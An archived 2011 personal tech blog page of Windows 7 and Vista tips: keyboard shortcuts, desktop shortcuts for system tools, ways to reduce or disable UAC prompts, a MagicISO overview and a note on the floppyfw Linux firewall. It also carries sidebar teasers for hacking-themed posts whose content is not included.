WARNING/DISCLAIMER

The Author/Blogger shall hold no liability for special, incidental, or consequential damages arising out of or resulting from the use/misuse of the information in this Blog. It is strictly mentioned that these are all for learning and awareness purpose. Most of the articles are collected from various sources and many of them are blogger's own which meant for helping people who are interested in security system or beginners help for security systems and various IT purposes. Some of the articles are solely intended for IT Professionals and systems administrators with experience servicing computer. It is not intended for home users, hackers, or computer thieves attempting to crack PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, software and please use this information responsibly. Binod Narayan Sethi is not responsible for the use or misuse of these material, including loss of data, damage to hardware or personal injury. Information can help you to catch hackers and crackers and other cyber criminals. Information can help you to detect and manipulate the evil motives of these anti social intellectual peoples. Good use of the information protect you from evils and misuse of the information make you evil/criminal. Author of this site will not be responsible for use of material for any illicit mean or illicit act done by anybody in any means.

Binod Narayan Sethi

Binod Narayan Sethi
Programming,Web Development & Graphic Designing are my Hobbies.

All About Hackers

Know about the Hacker and their types. How they impact on society. Freedom of knowledge is harmful or dangerious it all talk about a Hacker. Let explore it...

How to Hack Email Accounts

Wondering to know how to hack an email account? Well, before you can do that, you need to understand the real ways of hacking that actually work and also that are simply scam and do not work.

Legal aspects of computing

Legal aspects of computing are related to various areas of law. Cyberlaw is a term that encapsulates the legal issues related to use of communicative, transactional, and distributive aspects of networked information devices and technologies.

How to protect your email account from being hacked

Some of the most commonly used online scams which fool people and make them lose their passwords.The other commonly used method to steal password is by using a Key-logger. A Key-logger is nothing but a spyware.

TOP 5 HACKING TUTORIAL SITES

Hackers who find vulnerabilities to do nothing more than exploit them as much as humanly possible. Now that you know what sort of community you may be entering, let’s get on with the list of top sites where you can learn how to hack.

Monday, September 5, 2011

Hotkey for Creating New Folder in Windows Explorer

Hotkey for Creating New Folder in Windows Explorer

Have you ever wondered if there is a hotkey to create a new folder in Windows Explorer?

New Folder Hotkey in Windows 7

Windows 7 natively includes a shortcut key combination to create a new folder: Ctrl+Shift+N Simply use this shortcut key anywhere in Windows Explorer, and a new folder will be instantly created:

Using the Keyboard Accelerator Keys
You can use the keyboard accelerator keys: Alt+F to bring up the file menu, and then for the New menu, and then for new folder. So your shortcut key sequence ends up being F+W+F with the Alt key held down. (Try it out).

Create a Shortcut or Hotkey to Open Task Manager’s "All Users" View in Windows 7 or Vista

Create a Shortcut or Hotkey to Open Task Manager’s "All Users" View in Windows 7 or Vista
Have you ever wondered how to open up Task Manager with the “All Users” view instead of just your own processes? One of our readers wrote in with this same question, so I’m writing it up for everybody.

In case you are confused about what we’re talking about… on the Processes tab in Task Manager there’s a button called “Show processes from all users” which will re-open Task Manager in order to show all the processes, which can be annoying if you need to do it a lot.

Create the Task Manager Shortcut

Right-click on the desktop or elsewhere, and then choose New \ Shortcut from the menu.

Then in the shortcut location box, add the following command:

    taskmgr.exe

Once you’ve added the command, go to the next screen and give the shortcut a useful name – I chose “Task Manager (All Users)” as the name since it seemed descriptive enough.

Now right-click on the shortcut and open up Properties, where you can add a shortcut key if you’d like (note that the shortcut needs to be on the desktop or in the start menu for this to work)…

And now the most important step, click the Advanced button and choose the “Run as administrator” checkbox.

Now you’ll have a shortcut that will immediately open up Task Manager to the all users view (after a UAC prompt).

For extra credit, you could create the shortcut without a UAC prompt (it just takes a little more work).

Create a Shortcut or Hotkey to Turn Off the Monitor

Create a Shortcut or Hotkey to Turn Off the Monitor
Have you ever wanted to hit a shortcut key to turn off the monitor? Sure, you can use the Win+L combination to lock the screen, but that leaves your monitor on… and those of us with multiple monitors find it a pain to hunt down the power buttons all the time.

First we’ll show you how to simply power off the monitor, and then how to both lock and power it off.Create a Shortcut to Turn Off the Monitor. To create this shortcut, we’ll first need to grab a tiny multi-purpose utility called NirCmd from the great folks over at NirSoft. This Swiss-army knife tool can do an amazing array of tasks, including powering off the monitor. All we really need to do is create a shortcut to it.

Right-click anywhere on the desktop and choose New \ Shortcut:

Then you’ll want to browse to the location where you saved the nircmd.exe file, and add the following arguments:

    “C:\path\to\nircmd.exe” cmdwait 1000 monitor off

Make sure the path has quotes around it, and then you add the extra arguments, which will wait 1 second before powering off the monitor (otherwise Windows might misinterpret your last keystroke and wake back up).

Next you can go into the shortcut properties and assign a shortcut key, and then click Change Icon to pick a better one than the default.

In Vista, at least, there’s a great icon for turning off the monitor… pick the somewhat ugly one from the list below:

And when the icon actually shows up, it’s nice and shiny. Of course you are free to pick your own icon instead.
 
Lock the Workstation Too

For extra credit, you can create a shortcut that both locks the workstation as well as turns the monitor off. Unfortunately the Nircmd way involves more steps than necessary in Vista (in my testing, at least), so I’ve created a tiny executable called LockAndPowerDown.exe that will do both in one step.

To install it, simply download and extract the executable, and create a shortcut to it just as you did in the step above. To find the same icon, click on Change Icon, and then paste in “C:\Windows\System32\shell32.dll” into the browse box.

The application is written in AutoHotkey and the source code is included in the download file. Enjoy!

Create a Shortcut to the Stored User Names and Passwords Dialog in Windows

Create a Shortcut to the Stored User Names and Passwords Dialog in Windows

If you’ve ever saved a password when connecting to a website that requires authentication, for a remote desktop session or a mapped drive, you might have wondered where those passwords are saved. If you are a long time reader, you already know where, but you might be interested in how to create a shortcut directly to the dialog where you can manage those logons.

You can add this into your folder of useful shortcuts… sure, you might not use it every day, but it’s good to know how to do it.

Create the Shortcut

Right-click on the desktop and choose New \ Shortcut from the menu.
In the location box, enter in the following command, and then on the next page give the shortcut a helpful name.

    rundll32.exe keymgr.dll, KRShowKeyMgr

Once you have the shortcut, you’ll want to right-click on it and choose Properties, then click the Change Icon button on the Shortcut tab.

If you change the textbox value to the following file, you can find the matching icon for the shortcut (adjusting if your Windows is installed elsewhere)

    C:\Windows\System32\keymgr.dll

Now you should have a nice matching icon…
Which will open up the Stored User Names and Passwords dialog.
Note that you can also use this to backup and restore your saved passwords, and it should work in either Windows 7, Vista or XP.

Create Administrator Mode Shortcuts Without UAC Prompts in Windows 7 or Vista

Create Administrator Mode Shortcuts Without UAC Prompts in Windows 7 or Vista
One of the most talked about annoyances in Windows Vista are the UAC prompts that constantly pop up when you are trying to make system changes. It’s especially irritating when you often need to run a particular tool that requires administrator mode in order to run. Thankfully there’s a simple hack that you can do to create an administrator mode shortcut that doesn’t prompt for UAC.

Note: This should also work on Windows 7.

This works by setting up a scheduled task to run the application in Administrator mode, and then setting up a separate shortcut that tells the scheduled task to run. If that sounds difficult, it’s really not… just follow through the instructions below.

Note: Because you are required to click through a UAC prompt to setup the scheduled task, it’s not really a security loophole.

Create the Scheduled Task Item

Open up Task Scheduler through the start menu search box (usually you can just type task), and then on the right-hand side click the “Create Task” link:

The first thing you need to do is give the task a short, simple name, preferably without any spaces in it. Then check the box for “Run with highest privileges” (very important)

Now switch to the Actions tab, click the New button, and then browse down to the application that you are trying to start.

Close out of the dialogs by clicking the OK button, which should create the new task in the list. You can right-click on it and choose “Run” at this point, simply to make sure that it launches the application the way you were expecting.

At this point our scheduled tasks setup is done, so you can close out of that if you want… as long as you remember the name that you used for the task.

Create the Shortcut to Start the Task

Right-click anywhere on the desktop and choose New \ Shortcut from the menu.

Now here’s where the real magic happens… we need to add a command that will run the scheduled task, passing in the name of the task that we used. As you can see, I used runregedit as the name for the task.

Make sure you enter the task name like this, replacing the capitalized letters for the name of your task. (It’s not case sensitive)

Create Icons to Start the Screensaver on Windows 7 or Vista

Create Icons to Start the Screensaver on Windows 7 or Vista
Reader Jeffrey wrote in asking how to create an icon to start up the screensaver in Windows Vista. This question is so common that I figured I’d write up the answer for everybody, as well as provide a downloadable set of shortcuts to all the default screensavers (for Vista users).

Note that this technique should work for Windows 7, Vista, or even XP.

Create Screensaver Icon

Right-click on the desktop and choose New \ Shortcut from the menu.
In order to launch the screensaver, you’ll need to enter the full path to the screensaver file, followed by “/s”

    %systemroot%\system32\Bubbles.scr /s

You would want to substitute the name of the screensaver where you see “Bubbles.scr” above. Also note that I used %systemroot% instead of C:\windows because not every install uses the C: drive.

If you don’t know the filename, you can browse down to your system32 folder and then search for “.scr” using the search box:

You should see all of the names of all the screensavers installed on your system, which you can use in the location field.

Download Shortcut Icons (Vista Only)

If you’ve prefer, I made shortcuts for all the default screensavers and zipped them up. You can just download and extract the file, and then use whichever ones you want.

Note: I’m fairly certain I didn’t miss any default screensavers in the list, but it’s certainly possible since it’s 6am and I’m still awake.

Disable User Account Control (UAC) the Easy Way on Win 7 or Vista

Disable User Account Control (UAC) the Easy Way on Win 7 or Vista

I’ve previously written about a way to enable or disable UAC from the command line. This is an easier method that you can use to do the same thing from the GUI interface in either Windows 7 or Vista. To recap my earlier article, UAC is ANNOYING.

Note: Disabling UAC will lead to a less secure system, so be warned.

Disable UAC on Windows Vista

Open up Control Panel, and type in “UAC” into the search box. You’ll see a link for “Turn User Account Control (UAC) on or off”:

On the next screen you should uncheck the box for “Use User Account Control (UAC)”, and then click on the OK button.

You’ll need to reboot your computer before the changes take effect, but you should be all done with annoying prompts.

Disable UAC on Windows 7


Windows 7 makes it much easier to deal with UAC settings, and in fact you don’t have to completely disable UAC if you don’t want to. Just type UAC into the start menu or Control Panel search box.

You can simply drag the slider up or down, depending on how often you want to be alerted.
Windows 7 UAC Settings
If you drag it all the way down to the bottom, you’ll have disabled it entirely.

The Best List of Windows 7 Secrets

  1. Windows Management. By now, you’ve probably seen that Windows 7 does a lot to make window management easier: you can “dock” a window to the left or right half of the screen by simply dragging it to the edge; similarly, you can drag the window to the top of the screen to maximize it, and double-click the window top / bottom border to maximize it vertically with the same horizontal width. What you might not know is that all these actions are also available with keyboard shortcuts:
    • Win+Left Arrow and Win+Right Arrow dock;
    • Win+Up Arrow and Win+Down Arrow maximizes and restores / minimizes;
    • Win+Shift+Up Arrow and Win+Shift+Down Arrow maximizes and restores the vertical size.
    This side-by-side docking feature is particularly invaluable on widescreen monitors – it makes the old Windows way of shift-clicking on two items in the taskbar and then using the context menu to arrange them feel really painful.
  2. Display Projection. Had enough of messing around with weird and wonderful OEM display driver utilities to get your notebook display onto an external projector? In that case, you’ll be pleased to know that projection is really quick and simple with Windows 7. Just hit Win+P, and you’ll be rewarded by the following pop-up window:
    The Win+P Projector Settings window allows you to quickly switch display settings. 
    Use the arrow keys (or keep hitting Win+P) to switch to “clone”, “extend” or “external only” display settings. You can also access the application as displayswitch.exe.

    If you want broader control over presentation settings, you can also press Win+X to open the Windows Mobility Center, which allows you to turn on a presentation “mode” that switches IM clients to do not disturb, disables screensavers, sets a neutral wallpaper etc. (Note that this feature is also available in Windows Vista.)
  3. Cut Out The Clutter. Working on a document in a window and want to get rid of all the extraneous background noise? Simply hit Win+Home to minimize all the non-active background windows, keeping the window you’re using in its current position. When you’re ready, simply press Win+Home again to restore the background windows to their original locations.
  4. Multi-Monitor Windows Management. The earlier tip on window management showed how you can dock windows within a monitor. One refinement of those shortcuts is that you can use Win+Shift+Left Arrow and Win+Shift+Right Arrow to move windows from one monitor to another – keeping them in the same relative location to the monitor’s top-left origin.
  5. Command Junkies Only. One of the most popular power toys in Windows XP was “Open Command Prompt Here”, which enabled you to use the graphical shell to browse around the file system and then use the context menu to open a command prompt at the current working directory. In Windows 7 (and in Windows Vista, incidentally – although not many folk knew about it), you can simply hold the Shift key down while selecting the context menu to get exactly the same effect. If the current working directory is a network location, it will automatically map a drive letter for you.
  6. It’s a Global Village. If you’ve tried to change your desktop wallpaper, you’ve probably noticed that there’s a set of wallpapers there that match the locale you selected when you installed Windows. (If you picked US, you’ll see beautiful views of Crater Lake in Oregon, the Arches National Park, a beach in Hawai’i, etc.) In fact, there are several sets of themed wallpapers installed based on the language you choose, but the others are in a hidden directory. If you’re feeling in an international mood, simply browse to C:\Windows\Globalization\MCT and you’ll see a series of pictures under the Wallpaper directory for each country. Just double-click on the theme file in the Theme directory to display a rotation through all the pictures for that country. (Note that some countries contain a generic set of placeholder art for now.)
  7. The Black Box Recorder. Every developer wishes there was a way that an end-users could quickly and simply record a repro for the problem that they’re running into that is unique to their machine. Windows 7 comes to the rescue! Part of the in-built diagnostic tools that we use internally to send feedback on the product, the Problem Steps Recorder provides a simple screen capture tool that enables you to record a series of actions. Once you hit “record”, it tracks your mouse and keyboard and captures screenshots with any comments you choose to associate alongside them. Once you stop recording, it saves the whole thing to a ZIP file, containing an HTML-based “slide show” of the steps. It’s a really neat little tool and I can’t wait for it to become ubiquitous on every desktop! The program is called psr.exe; you can also search for it from Control Panel under “Record steps to reproduce a problem”.
    The Problem Steps Recorder provides an easy way for users to record a problem repro for later diagnosis.
  8. The Font of All Knowledge. Long Zheng will be happy: we’ve got rid of the Add Fonts dialog that has served Windows faithfully for the last twenty years. (Of course, for most of that time, it’s been deprecated – the easy way to install a set of fonts has simply been to drag them into the Fonts folder via Control Panel.) But now font installation is really easy – we’ve added an “Install” button to the font viewer applet that takes care of the installation process:
    You can install a font in Windows 7 from the standard font viewer dialog.
    There are lots of other new features built into Windows 7 that will satisfy those of a typographic bent, incidentally – grouping multiple weights together, the ability to hide fonts based on regional settings, a new text rendering engine built into the DirectWrite API, and support in the Font common file dialog for more than the four “standard” weights. For example:
    The new common font dialog in Windows 7 supports more than four weights for a font. 
  9. Gabriola. As well as the other typographic features mentioned above, Windows 7 includes Gabriola, an elaborate display type from the Tiro Typeworks foundry that takes advantage of OpenType Layout to provide a variety of stylistic sets, flourishes and ornamentation ligatures:
    Some sample variants of the Gabriola display font.
  10. Who Stole My Browser? If you feel like Internet Explorer is taking a long time to load your page, it’s worth taking a look at the add-ons you have installed. One of the more helpful little additions in Internet Explorer 8 is instrumentation for add-on initialization, allowing you to quickly see whether you’re sitting around waiting for plug-ins to load. Just click Tools / Manage Add-ons, and then scroll right in the list view to see the load time. On my machine, I noticed that the Research add-on that Office 2007 installs was a particular culprit, and since I never use it, it was simple to disable it from the same dialog box.
  11. Rearranging the Furniture. Unless you’ve seen it demonstrated, you may not know that the icons in the new taskbar aren’t fixed in-place. You can reorder them to suit your needs, whether they’re pinned shortcuts or running applications. What’s particularly nice is that once they’re reordered, you can start a new instance of any of the first five icons by pressing Win+1, Win+2, Win+3 etc. I love that I can quickly fire up a Notepad2 instance on my machine with a simple Win+5 keystroke, for instance.

    What’s less well-known is that you can similarly drag the system tray icons around to rearrange their order, or move them in and out of the hidden icon list. It’s an easy way to customize your system to show the things you want, where you want them.
  12. Installing from a USB Memory Stick. My wife has a Samsung NC10 netbook (very nice machine, by the way), and we wanted to install Windows 7 Beta on this machine to replace the pre-installed Windows XP environment. Like most netbook-class devices, this machine has no built-in media drive, and nor did I have an external USB DVD drive available to boot off. The solution: I took a spare 4GB USB 2.0 thumbdrive, reformatted it as FAT32, and simply copied the contents of the Windows 7 Beta ISO image to the memory stick using xcopy e:\ f:\ /e /f (where e: was the DVD drive and f: was the removable drive location). Not only was it easy to boot and install from the thumbdrive, it was also blindingly fast: quicker than the corresponding DVD install on my desktop machine.

    It’s also worth noting in passing that Windows 7 is far better suited to a netbook than any previous operating system: it has a much lighter hard drive and memory footprint than Windows Vista, while also being able to optimize for solid state drives (for example, it switches off disk defragmentation since random read access is as fast as sequential read access, and it handles file deletions differently to minimize wear on the solid state drive).
  13. I Want My Quick Launch Toolbar Back! You might have noticed that the old faithful Quick Launch toolbar is not only disabled by default in Windows 7, it’s actually missing from the list of toolbars. As is probably obvious, the concept of having a set of pinned shortcut icons is now integrated directly into the new taskbar. Based on early user interface testing, we think that the vast majority of users out there (i.e. not the kind of folk who read this blog, with the exception of my mother) will be quite happy with the new model, but if you’re after the retro behavior, you’ll be pleased to know that the old shortcuts are all still there. To re-enable it, do the following:
    • Right-click the taskbar, choose Toolbars / New Toolbar
    • In the folder selection dialog, enter the following string and hit OK:
      %userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
    • Turn off the “lock the taskbar” setting, and right-click on the divider. Make sure that “Show text” and “Show title” are disabled and the view is set to “small icons”.
    • Use the dividers to rearrange the toolbar ordering to choice, and then lock the taskbar again.
    If it’s not obvious by the semi-tortuous steps above, it’s worth noting that this isn’t something we’re exactly desperate for folks to re-enable, but it’s there if you really need it for some reason. Incidentally, we’d love you to really try the new model first and give us feedback on why you felt the new taskbar didn’t suit your needs.
  14. It’s a Drag. Much play has been made of the Jump Lists feature in Windows 7, allowing applications like Windows Live Messenger to offer an easy task-based entry point. Jump lists replace the default right-click context menu in the new taskbar; another way to access them (particularly useful if you’re running Windows 7 on a one-button MacBook) is by left-clicking and dragging up in a kind of “swooshing” motion. This was designed for touch-enabled devices like the beautiful HP TouchSmart all-in-one PC, where the same gesture applies.

    Another place where you can “swoosh” (not an official Microsoft term) is the IE 8 address bar, where the downward drag gesture brings up an expanded list containing the browser history, favorites and similar entries. The slower you drag, the cooler the animation!
  15. Standards Support. Every review of Windows 7 that I’ve seen has noted the revamped WordPad and Paint applets that add an Office-like ribbon to expose their functionality. Few, however, have noticed one small but hopefully appreciated feature: WordPad can now read and write both the Word 2007-compatible Office Open XML file format but also the OpenDocument specification that IBM and Sun have been advocating:
    WordPad in Windows 7 allows you to save in ODF or OOXML formats. 
  16. Windows Vista-Style Taskbar. I wasn’t initially a fan of the Windows 7 taskbar when it was first introduced in early Windows 7 builds, but as the design was refined in the run up to the beta, I was converted and now actively prefer the new look, particularly when I’ve got lots of windows open simultaneously. For those who really would prefer a look more reminiscent of Windows Vista, the good news is that it’s easy to customize the look of the taskbar to more closely mirror the old version:
    The Windows 7 Taskbar can be configured for a Windows Vista compatibility view. 
    To achieve this look, right-click on the taskbar and choose the properties dialog. Select the “small icons” checkbox and under the “taskbar buttons” setting, choose “combine when taskbar is full”. It’s not pixel-perfect in accuracy, but it’s close from a functionality point of view.
  17. Peeking at the Desktop. While we’re on the taskbar, it’s worth noting a few subtleties. You’ve probably seen the small rectangle in the bottom right hand corner: this is the feature we call “Aero Peek”, which enables you to see any gadgets or icons you’ve got on your desktop. I wanted to note that there’s a keyboard shortcut that does the same thing – just press Win+Space.
  18. Running with Elevated Rights. Want to quickly launch a taskbar-docked application as an administrator? It’s easy – hold down Ctrl+Shift while you click on the icon, and you’ll immediately launch it with full administrative rights (assuming your account has the necessary permissions, of course!)
  19. One More of the Same, Please. I’ve seen a few folk caught out by this one. If you’ve already got an application open on your desktop (for example, a command prompt window), and you want to open a second instance of the same application, you don’t have to go back to the start menu. You can simply hold down the Shift key while clicking on the taskbar icon, and it will open a new instance of the application rather than switching to the existing application. For a keyboard-free shortcut, you can middle-click with the third mouse button to do the same thing. (This trick assumes that your application supports multiple running instances, naturally.)
  20. Specialized Windows Switching. Another feature that power users will love is the ability to do a kind of “Alt+Tab” switching across windows that belong to just one application. For example, if you’ve got five Outlook message windows open along with ten other windows, you can quickly tab through just the Outlook windows by holding down the Ctrl key while you repeatedly click on the single Outlook icon. This will toggle through each of the five Outlook windows in order, and is way faster than opening Alt+Tab and trying to figure out which of the tiny thumbnail images relates to the specific message you’re trying to find.
  21. Walking Through the Taskbar. Another “secret” Windows shortcut: press Win+T to move the focus to the taskbar. Once you’re there, you can use the arrow keys to select a particular window or group and then hit Enter to launch or activate it. As ever, you can cancel out of this mode by hitting the Esc key. I don’t know for sure, but I presume this shortcut was introduced for those with accessibility needs. However, it’s equally valuable to power users – another good reason for all developers to care about ensuring their code is accessible.
  22. image The Widescreen Tip. Almost every display sold these days is widescreen, whether you’re buying a notebook computer or a monitor. While it might be great for watching DVDs, when you’re trying to get work done it can sometimes feel like you’re a little squeezed for vertical space.

    As a result, the first thing I do when I set up any new computer is to dock the taskbar to the left hand side of the screen. I can understand why we don’t set this by default – can you imagine the complaints from enterprise IT departments who have to retrain all their staff – but there’s no reason why you as a power user should have to suffer from default settings introduced when the average screen resolution was 800x600.

    In the past, Windows did an indifferent job of supporting “side dockers” like myself. Sure, you could move the taskbar, but it felt like an afterthought – the gradients would be wrong, the Start menu had a few idiosyncrasies, and you’d feel like something of a second-class citizen. The Windows 7 taskbar feels almost as if it was designed with vertical mode as the default – the icons work well on the side of the screen, shortcuts like the Win+T trick mentioned previously automatically switch from left/right arrows to up/down arrows, and so on. The net effect is that you wind up with a much better proportioned working space.

    Try it – in particular, if you’ve got a netbook computer that has a 1024x600 display, you’ll immediately appreciate the extra space for browsing the Internet. For the first day you’ll feel a little out of sync, but then I guarantee you’ll become an enthusiastic convert!
  23. Pin Your Favorite Folders. If you’re always working in the same four or five folders, you can quickly pin them with the Explorer icon on the taskbar. Hold the right-click button down and drag the folder to the taskbar, and it will be automatically pinned in the Explorer Jump List.
  24. Starting Explorer from “My Computer”. If you spend more time manipulating files outside of the documents folders than inside, you might want to change the default starting directory for Windows Explorer so that it opens at the Computer node:
    The Computer node in Windows 7. 
    To do this, navigate to Windows Explorer in the Start Menu (it’s in the Accessories folder). Then edit the properties and change the target to read:
    %SystemRoot%\explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
    If you want the change to affect the icon on the taskbar, you’ll need to unpin and repin it to the taskbar so that the new shortcut takes affect. It’s worth noting that Win+E will continue to display the documents library as the default view: I’ve not found a way to change this from the shell at this time.
  25. ClearType Text Tuning and Display Color Calibration. If you want to tune up your display for image or text display, we have the tools included out of the box. It’s amazing what a difference this makes: by slightly darkening the color of the text and adjusting the gamma back a little, my laptop display looks much crisper than it did before. You’d adjust the brightness and contrast settings on that fancy 42” HDTV you’ve just bought: why wouldn’t you do the same for the computer displays that you stare at every day? 
    image image
    Check out cttune.exe and dccw.exe respectively, or run the applets from Control Panel.
  26. ISO Burning. Easy to miss if you’re not looking for it: you can double-click on any DVD or CD .ISO image and you’ll see a helpful little applet that will enable you to burn the image to a blank disc. No more grappling for shareware utilities of questionable parentage!
    You can burn an ISO image to disk with this built-in utility in Windows 7.
  27. Windows Movie Maker. Windows 7 doesn’t include a movie editing tool – it’s been moved to the Windows Live Essentials package, along with Photo Gallery, Mail and Messenger. Unfortunately, Windows Live Movie Maker is currently still in an early beta that is missing most of the old feature set (we’re reworking the application), and so you might be feeling a little bereft of options. It goes without saying that we intend to have a better solution by the time we ship Windows 7, but in the meantime the best solution for us early adopters is to use Windows Movie Maker 2.6 (which is essentially the same as the most recent update to the Windows XP version). It’s missing the full set of effects and transitions from the Windows Vista version, and doesn’t support HD editing, but it’s pretty functional for the typical usage scenario of home movie editing.
    Windows Movie Maker 2.6 is compatible with Windows 7. 
    Download Windows Movie Maker 2.6 from here:
    http://microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc 
  28. Hiding the Windows Live Messenger Icon. Hopefully your first act after Windows 7 setup completed was to download and install the Windows Live Essentials suite of applications (if not, then you’re missing out on a significant part of the Windows experience). If you’re a heavy user of IM, you may love the way that Windows Live Messenger is front and central on the taskbar, where you can easily change status and quickly send an IM to someone:
    Windows Live Messenger appears by default on the taskbar.
    On the other hand, you may prefer to keep Windows Live Messenger in the system tray where it’s been for previous releases. If so, you can fool the application into the old style of behavior. To do this, close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode. Bingo!
  29. Enjoy The Fish. I’m surprised that not many people seem to have caught the subtle joke with the Siamese fighting fish that is part of the default background, so I’ll do my part at keeping the secret hidden. Check out wikipedia for a clue.
  30. When All Else Fails… There are always those times when you’re in a really bad spot – you can’t boot up properly, and what you really want is something you can quickly use to get at a command prompt so you can properly troubleshoot. Windows 7 now includes the ability to create a system repair disc, which is essentially a CD-bootable version of Windows that just includes the command prompt and a suite of system tools. Just type “system repair disc” in the Start Menu search box, and you’ll be led to the utility.

15 Best Windows 7 Tips and Hacks

15 Best Windows 7 Tips and Hacks

1. Use Keyboard Shortcuts

Using the mouse, you can drag-”˜n-dock windows to either side of the screen, or drag it to the top to maximize it. These keyboard shortcuts are even faster:
  • Win+Left Arrow and Win+Right Arrow dock the window to the left and right side of the screen
  • Win+Up Arrow and Win+Down Arrow maximize and restore/minimize
  • Win+M minimizes everything
  • Alt+Up, Alt+Left Arrow, Alt+Right Arrow navigate to parent folder, or browse Back and Forward through folders in Explorer
  • Win+Home minimizes/restores all open windows except the active window
  • Alt+Win+# accesses the Jump List of program number ‘#’ on the taskbar

2.Rearrange System Tray Icons

SystemTray
You can rearrange icons on the taskbar as you wish and start new (or switch to running) instances of the first ten taskbar programs using Win+1, Win+2, and so on. The cool thing is you can also rearrange system tray icons. Reorder them on the tray or move them outside or back in the tray. Take control of what you want to always keep an eye on, and from which apps you’ll require notifications.

3. Access Jump Lists with the Left Mouse Button

Jump Lists usually show up when you right-click on a taskbar icon. However, they can also be accessed by holding the left mouse button and dragging upwards. If you’re using a laptop touchpad or a touch screen, this is convenient because you do not have to click any button to access a context menu.

4. Add Any Folder to Favorites

AddToFavorites
You can add any library or folder to the Favorites section in Windows Explorer. To add a folder, navigate to it in Explorer, right-click Favorites in the left navigation pane, and select Add current location to Favorites. Now you get quick access to your favorite folders in all File->Save As dialogs!

5. Pin Frequently Used Folders to the Taskbar

Right-click, drag, and pin your favorite folders to Windows Explorer on the taskbar. They will now show up in the Jump List when you right click on Explorer giving you quick access to your favorite folders.

6. Pin Control Panel to the Taskbar

PinControlPanel
You cannot pin the Control Panel to the taskbar via the Start Menu or by drag and drop. Open the Control Panel and right-click its taskbar icon to pin it to the taskbar. An advantage of this is that Control Panel’s Jump List allows quick access to recently used functions.

7. Create Keyboard Shortcuts for Programs

You can create keyboard shortcuts for any program in Windows 7. Right-click the program icon and select Properties. Select the Shortcut tab, click in Shortcut key, to set the keyboard shortcut for that program.
ProgramShortcutKey

8. Open Command Prompt in Any Folder

Like the command prompt? Miss the “˜Open Command Window Here’ Windows XP power toy? Press “˜Shift’ when right-clicking on a folder to get that option in the context menu. This also works on the desktop. No power toy required!
ExpandedContextMenu

9. View Expanded ‘Send To’ Menu

Press Shift when right-clicking on a folder to get an expanded Send To menu.

10. Adjust Screen Text with Clear Type

Use Clear Type Tuner for the best look on your LCD monitor or laptop screen. Run “˜cttune.exe‘ from the Start Menu search box, or go to the Control Panel Display applet, and select Adjust ClearType Text from the left.
ClearType Tuner

11. Get Exact Colors On Your Screen

If you are an artist or you work with colors, use the Calibrate Color option in the Control Panel Display applet or run dccw.exe from the Start Menu search box. You can adjust gamma, brightness, contrast, and color balance, ensuring that colors are displayed correctly on your screen.

12. Customize the Power Button

If you restart your computer more often than you shut it down, change the default Shutdown power button to Restart. Right-click on Start, select Properties, and choose the Power button action that you use the most.
StartMenuProperties

13. Customize Number of Items in Jump Lists & Start Menu

Right-click Start, select Properties, click Customize and choose the number of recent programs to be shown in the Start Menu and the number of items displayed in Jump Lists from the Start Menu Size section below.

14. Search Internet from the Start Menu

SearchInternetStartMenu
Enable Internet search from the Start Menu using your default browser. Run GPEDIT.MSC from the Start Menu search box to start the Group Policy Editor. In the left pane, go to User Configuration->Administrative Templates->Start Menu and Taskbar. In the right pane, right-click to Edit and Enable Add Search Internet link to Start Menu.
SearchInternet

15. Add Videos to Start Menu

Windows 7 does not place a link to your videos on the Start Menu by default. To add a link to your videos on the Start Menu, right-click Start, select Properties, click on Customize. In the Videos section at the bottom, choose Display as a link.
Add Videos
Did you like these tips? Tell us or share your tricks with us in the comments! Don’t forget to watch out for Part 2!

MagicISO Introduction

MagicISO is a ISO CD/DVD image file creating/editing/converting tool , it can directly edit the CD/DVD image file and extract files and folders from it, as well as directly make ISO files from your CD/DVD-ROM or hard disk. At the same time, you can maintain the ISO bootable information, thus creating your own bootable CD/DVDs. You now have the power to make and edit your own ISO files, and then burn them to CD/DVD for your own needs.

MagicISO is in sole possession of the intellectualized ISO document format analyzer, it can process at the present time almost all types of image files, including ISO and BIN, it may even support new image files which are yet to be created. MagicISO can open these image files, directly extract files and folders, edit it and convert other image files to the standard ISO format.

MagicISO uses the double window unification user contact interface, you have the choice to only use the quick buttons and/or the mouse Drag & Drops, you can handle any CD/DVD image file easily.

Main Features:

Can directly edit the ISO image file.

Can directly extract files and folders from ISO image file

Can add / delete /create new directory /rename ISO file image content.

Can make ISO file from hard disk document.

Can create CD/DVD image from CD/DVD-ROM, maintain bootable information.

Can process the compact disc boot information, you can directly add/remove/extract boot image of the ISO image.

Supports nearly all known CD/DVD image file formats (.ISO, .BIN, .IMG, .CIF, .NRG, .BWI and so on) , and converts them to the standard ISO form image.

May directly set the file/folder to hidden attribute

Supports ISO 9660 Level1/2/3 and Joliet extension

Automatically optimizes the ISO image file structure, saves the disc space.

Supports the shell document type integration, Open Image files through double clicking them or the Right Click menu of the mouse with the open dialog.

The double window user interface is extremely convenient to use.

Can create ALL in 1 bootable compact discs, CD/DVD image file management, even the virtual CD/DVD drive , those functions are really powerful.

Can directly burn iso imae onto CD-R/RW,DVD-R/RW,DVD+R/RW

How to open DMG file

You can use MagicISO to convert them to ISO Files which can be  easily open on a Windows with WinRAR.

1. Download from here: http://www.magiciso.com/download.htm
2. Read instructions here: http://www.magiciso.com/FAQ/FAQ0011.htm

OR

1. Run MagicISO
2. Click  menu "File" | "Open"
3. Choose DMG  file and click Ok. 


4. Click Extract.. button to extract the files and folder from DMG files.
For more details of opening DMG file, please visit http://www.magiciso.com/tutorials/miso-editiso.htm

Thursday, September 1, 2011

Hardware Firewall

The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.

Brief Description:
floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.

Features:
Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.
Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )
Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)
Logging through klogd/syslogd, both local and remote.
